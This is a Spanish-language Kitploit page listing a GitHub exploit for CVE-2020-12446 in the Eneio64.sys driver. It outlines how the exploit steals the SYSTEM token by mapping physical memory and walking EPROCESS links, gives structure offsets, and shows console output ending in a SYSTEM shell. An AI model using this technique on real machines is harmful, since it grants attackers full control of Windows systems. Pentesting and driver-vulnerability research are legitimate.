Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Eneio64-LPE — Un exploit para CVE-2020-12446 Eneio64.sys. Utiliza superfetch para la traducción de direcciones. | Kitploit
Herramientas/GitHubGitHub/s1lkys/eneio64-lpe
Escalada de PrivilegiosExplotaciónAprendizaje y EducaciónExplotación de Binarios
GitHubs1lkys/eneio64-lpe

Eneio64-LPE

Un exploit para CVE-2020-12446 Eneio64.sys. Utiliza superfetch para la traducción de direcciones.

Ver Repositorio
37hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
  1. Abre un manejador al controlador vulnerable
  2. Mapea la memoria física al espacio de usuario
  3. Abre un manejador al proceso System
  4. Consulta la tabla SystemHandleInformation del proceso actual para obtener el manejador del sistema filtrado, filtrando su dirección EPROCESS.
  5. Recorre los ActiveProcessLinks (flink) del EPROCESS del sistema hasta encontrar el PID del proceso actual.
  6. Parchea el token del proceso actual con el token del proceso System
  7. Lanza un nuevo proceso powershell.

Utiliza el método superfetch para la traducción de direcciones virtuales a físicas en lugar de filtrar CR3 y recorrer las tablas de páginas.

Probado en Win11 21H2

root@kitploit:~
C:\Users\Public>.\Eneio64-LPE.exe
[+] Total physical memory: ~0x7fef2000 bytes
[+] Mapped physical memory at 000002A3A4FC0000
[+] Leaking System EPROCESS
[+] Opened handle to SYSTEM process (PID 4)
>    Current PID:  3932
>    Handle value: 0x5c
[+] Querying SystemHandleInformation table of current process
[+] Handle table queried successfully
>    Buffer size:    1048576 bytes
>    Resize rounds:  15
>    Total handles:  29211
[+] Searching for handle 0x5c in handle table
[+] Match found at index 29183 / 29211
>    PID:                      3932
>    Handle:                   0x5c
>    Object (System EPROCESS): 0xffff858ca1885040
[+] Searching for current process token. Walking ActiveProcessLinks from System Flink (System EPROCESS + 0x448) to current PID
[+] Next Flink addr - 0x448 = Next EPROCESS
[+] Found current process (PID 3932) token at [0x72cd25f8]
[+] Patching current token with SYSTEM token
[!] ==== Flink addr of current PID - EPROCESS ActiveProcessLinks Offset (0x448) + EPROCESS Token Offset (0x4B8) = Current Token ====
[+] Token replaced.
Microsoft Windows [Version 10.0.20348.2849]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Public>whoami
nt authority\system

¡Solo para uso educativo!

Descargar herramienta